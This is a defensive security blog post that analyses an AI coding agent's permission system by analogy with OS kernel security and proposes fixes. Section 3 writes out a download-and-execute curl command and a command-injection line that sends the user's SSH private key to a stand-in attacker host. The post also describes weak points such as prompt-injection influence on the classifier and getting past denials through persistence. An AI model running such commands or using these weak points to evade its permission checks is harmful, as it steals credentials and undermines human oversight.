Table of Contents
AI agents don't just generate text. They execute actions.
And every action passes through a permission system that decides whether that execution is allowed.
That makes the permission system the most security-critical component in the entire architecture. It is the boundary between an AI agent that helps you write code and one that exfiltrates your SSH keys, installs a rootkit, or pushes malicious code to production.
This is not a UX feature. This is the system that decides whether the model can act on your environment.
The problem: we are treating it like a feature instead of a kernel.
We analyzed the permission system inside Claude Code (v2.1.88) -- roughly 3,000 lines of TypeScript implementing rule matching, classifier-based approval, hook-driven policy enforcement, and multi-source configuration loading. These are the same primitives that SELinux, AppArmor, and the Linux Security Module framework implement for operating systems.
The difference: kernel security has fifty years of battle scars, formal verification research, and adversarial hardening. AI permission systems have roughly two.
We recreated kernel security architecture -- without the constraints that make it safe.
Section 1: The Mapping
Every security professional understands OS permissions. The AI agent permission model maps almost perfectly onto concepts we already know. The danger is that familiarity breeds false confidence.
| OS Concept | AI Agent Equivalent | Evidence |
|---|---|---|
| Kernel | permissions.ts -- central authority |
hasPermissionsToUseTool: single entry point for every tool invocation (~1,500 lines) |
| System calls | Tools (Bash, FileWrite, Glob, etc.) | tools.ts registers ~30 tools, each with inputSchema, checkPermissions, and call |
| File permissions (rwx) | Permission behaviors: allow, deny, ask |
types/permissions.ts: PermissionBehavior. The ask has no kernel equivalent -- human-in-the-loop |
| Permission modes (user/root) | 7 modes: default through bypassPermissions |
PermissionMode.ts: escalating privileges. bypassPermissions = root. auto = AI-assisted enforcement. dontAsk = auto-deny. bubble = delegate to parent. |
| /etc/sudoers | CLAUDE.md + permission rules from 7+ sources | permissionsLoader.ts: policy, flags, user, project, local, cliArg, command, session |
| LSM hooks | Hooks and plugins | executePermissionRequestHooks: PreToolUse hooks intercept and override decisions |
| SELinux / AppArmor | Auto-mode classifier | yoloClassifier.ts: two-stage LLM classifier evaluates conversation context |
| Process isolation | Subagent containment | shouldAvoidPermissionPrompts: converts ask to deny in headless mode |
| Capabilities (CAP_*) | Tool-specific content rules | Bash(npm test:*): gitignore-style patterns grant fine-grained capabilities |
| Dangerous syscall filtering | isDangerousBashPermission |
dangerousPatterns.ts: strips interpreter/runner/shell allow-rules before auto-mode |
The mapping is structurally correct. The maturity is not.
When you trace a tool invocation through hasPermissionsToUseToolInner, you see the same layered architecture as kernel security:
- Deny rules first (step 1a) -- like DAC denial before MAC
- Ask rules (step 1b) -- like MAC policy interception
- Tool-specific checks (step 1c) -- like per-syscall validation
- Safety checks that survive privilege escalation (step 1g) -- like immutable security labels
- Mode-based bypass (step 2a) -- like capability checks
- Allow rules (step 2b) -- like ACL matching
- Default to ask (step 3) -- like default-deny policy
This is a well-structured security architecture. It is also two years old.
Section 2: How the Permission Kernel Works
The Seven Permission Modes
Claude Code operates in one of seven permission modes, each a different security posture:
default: Every dangerous action requires human approval. Principle of least privilege.acceptEdits: File edits in the working directory auto-approve. Bash, subagents, external edits still require approval.plan: Read-only. No mutations. Drop write capabilities.dontAsk: Anyaskresult becomesdeny. Auto-reject rather than prompt.bypassPermissions: All actions auto-approved except hardcoded safety checks. Effectively root.auto: AI classifier evaluates each action. Probabilistic enforcement.bubble: Delegate decision to parent agent in multi-agent contexts.
Security implication: Mode switching is privilege escalation. Moving from default to auto to bypassPermissions is not a convenience change -- it is a change in trust boundary. Each mode transition should be treated as a security event.
The Seven Rule Sources
Rules load from seven distinct sources via permissionsLoader.ts:
policySettings-- Enterprise/MDM policy. Can override everything.flagSettings-- Via--settingsCLI flag.userSettings--~/.claude/settings.json.projectSettings--.claude/settings.json(committed to repo).localSettings--.claude/settings.local.json(gitignored).cliArg----allowed-toolsand similar arguments.session-- Ephemeral rules from "Allow for this session" clicks.
Security implication: Seven configuration sources create a policy surface that is extremely difficult to reason about. This is a known failure mode in security systems. Enterprise environments already collapse to one source (allowManagedPermissionRulesOnly) -- an admission that the multi-source model is too complex to audit.
The Auto-Mode Classifier
The most architecturally significant component. yoloClassifier.ts implements a two-stage evaluation:
- Fast stage: Lightweight LLM call evaluates action against conversation transcript and rules.
- Extended thinking: If fast stage is uncertain, deeper analysis with extended reasoning.
Before the classifier runs, fast paths short-circuit:
- Safe tool allowlist (
SAFE_YOLO_ALLOWLISTED_TOOLSinclassifierDecision.ts): FileRead, Grep, Glob, LSP, ToolSearch auto-pass. - AcceptEdits fast path: Actions allowed in
acceptEditsmode auto-pass. - Dangerous rule stripping:
isDangerousBashPermissionstrips interpreter/runner/shell allow-rules that would let arbitrary code bypass the classifier.
The classifier returns allow, block, or unavailable. On unavailable, the system defaults to fail-closed (deny).
Denial Tracking
Consecutive classifier denials trigger escalation to human prompting via denialTracking.ts. This circuit breaker prevents deny loops -- but it also means the classifier's security decisions can be overridden by persistence.
Section 3: Where This Breaks (Fundamentally)
The OS analogy is instructive. Its cracks reveal why AI security is harder than anything we have built before.
1. Probabilistic Security -- A New Paradigm
Kernel security is deterministic. Given a process with UID 1000 opening /etc/shadow, the kernel always makes the same decision. The security model is a function from (subject, object, operation) to (allow, deny). It can be exhaustively tested.
The auto-mode classifier introduces probabilistic security -- a concept with no precedent in system security. The classifier is an LLM whose decisions are influenced by conversation tokens, training data, prompt construction, sampling parameters, and cache state.
The same action, in the same conversation, can produce different decisions on different runs. This is not a bug. It is an inherent property of using a probabilistic model for enforcement.
This is the first time in computing history that we are using a probabilistic system to enforce execution policy. That means the same action can be allowed or denied depending on how the model interprets it. That is not enforcement. That is judgment.
2. Natural Language vs. Well-Defined Objects
Operating system permissions operate on well-defined objects. Files have paths, owners, permission bits. Processes have PIDs, UIDs, capabilities. Objects are enumerable. Properties are deterministic. Interactions are formally specifiable.
AI agent permissions operate on natural language intent embedded in tool parameters. When Bash receives {"command": "curl -s https://attacker.com/payload | bash"}, the system must understand this is a download-and-execute attack, not a benign API call.
The rule Bash(npm test:*) seems safe. But npm test:* && curl attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) is command injection that matches the prefix.
In kernel security, ambiguity is a bug. In AI systems, ambiguity is the input.
3. Human-in-the-Loop Does Not Scale
The ask behavior creates a dependency on human review. This works for interactive development. It does not work for CI/CD pipelines, background agents, or multi-agent coordination.
The code addresses this with shouldAvoidPermissionPrompts (converts ask to deny headlessly) and the auto-mode classifier (replaces human judgment with AI judgment).
Human approval does not scale. So we replace it with automation. And that automation is the same model we are trying to constrain.
4. Combinatorial Configuration Complexity
Seven rule sources, three behaviors per source, content-specific rules per tool, seven permission modes. To answer "will this Bash command be allowed?" you must evaluate:
- Deny rules from 7 sources
- Ask rules from 7 sources
- Tool's own
checkPermissions - Dangerous path checks
- Current permission mode
- AcceptEdits fast path (if auto)
- Safe tool allowlist (if auto)
- Classifier decision (if auto)
- Headless mode
- Hook modifications
Every one of these checks is a potential misconfiguration point. The allowManagedPermissionRulesOnly enterprise feature collapses seven sources to one -- because the full model is too complex to secure.
5. No Formal Verification
There is no formal model. The decision cascade is specified in code comments ("step 1a", "step 1b") but not in a formal language. No proof that deny rules always prevail. No proof that safety checks survive all mode transitions. No proof that the classifier cannot be manipulated through prompt injection.
The closest thing to formal specification is TypeScript's type system: PermissionDecision is a discriminated union ensuring all paths produce valid decisions. But type safety is not security verification.
6. The False Depth
Multiple layers -- rules, modes, tool checks, safety checks, classifiers, hooks, denial tracking -- create an appearance of defense in depth. But each layer has its own attack surface:
- Rules: misconfigurable (7 sources makes this easy)
- Classifier: influenceable by adversarial content
- Hooks: user-supplied code that could be compromised
- Safety checks: hardcoded list requiring manual maintenance
- Denial tracking: exhaustible through persistence
True defense in depth requires independently trustworthy layers. When the classifier is probabilistic and the hooks are user code, the layers are not independent.
The Design Problem
The permission system is asked to answer a question it cannot reliably answer:
"Is this action safe?"
But safety is not a property of syntax. It is a property of intent.
And intent is inferred through a probabilistic model.
That creates a system where policy is defined deterministically but enforcement is probabilistic. The rules say what should happen. The classifier decides whether this specific case matches those rules. And the classifier can be wrong.
The root risk: Deterministic policy, probabilistic enforcement. That mismatch is the root of the risk.
Section 4: The Maturity Gap
Every one of these gaps is already a solved problem in operating system security.
Capability-based security -- Linux capabilities decompose root into 30+ individual privileges. AI agent permissions operate at the tool level, not the resource level. There is no capability for "network access" or "filesystem reads outside the project." The SAFE_YOLO_ALLOWLISTED_TOOLS allowlist hints at a capability model but is hardcoded and applies only to classifier bypass.
Mandatory access controls -- SELinux policies are enforced by the kernel. Even root cannot violate them. AI agent permissions are fundamentally advisory. bypassPermissions exists. Safety checks are hardcoded in the decision cascade, not a separate enforcement engine.
Audit trails -- auditd records every syscall in a tamper-evident log satisfying regulatory requirements. The permission system emits product analytics (logEvent('tengu_auto_mode_decision', ...)), not security logging. No tamper-evident audit. No decision chain reconstruction. No anomaly alerting.
Sandboxing -- Container isolation provides namespaces, cgroups, seccomp-bpf. Subagent "isolation" in Claude Code converts ask to deny in headless mode. The subagent shares filesystem, environment variables, and network access with the parent. Containment, not isolation.
Section 5: What Needs to Change
Formalize the permission model. Define it mathematically. Specify subjects, objects, operations. Prove invariants: "deny always prevails," "safety checks survive all mode transitions." Verify the implementation against the model.
Reduce rule sources. Seven sources are impossible to audit manually. Collapse to three: managed policy, project configuration, session overrides.
Replace probabilistic enforcement for high-risk actions. Data exfiltration, credential access, and production code execution should be governed by deterministic policies, not LLM judgment. The classifier is appropriate for ambiguous cases. The boundary between "classifier-appropriate" and "policy-required" should be explicit and configurable.
Build security-focused audit tooling. Tamper-evident decision logs. Replay capability for any invocation. Anomaly detection on permission patterns. Policy simulation: "given this configuration, would this action be allowed?"
Treat permissions as security infrastructure. The system lives in utils/permissions/, tested with functional tests, reviewed with the same process as any feature. Security-critical code deserves dedicated security review, fuzzing, adversarial testing, and public vulnerability disclosure.
Conclusion
We already know how to build secure permission systems.
They are deterministic. They are auditable. They are constrained.
AI agent permissions are none of those things yet.
And until they are, every action an agent takes is governed by a system we cannot fully reason about.
That is not a maturity gap. That is a risk surface.
Continue the Series
This is Part 4 of the 10-part series: Anatomy of a Production AI Agent
Scott Thornton is an AI security researcher at perfecXion.ai, specializing in defensive research on LLM and agent vulnerabilities. All analysis was conducted on lawfully obtained, publicly distributed npm package code in an authorized research environment.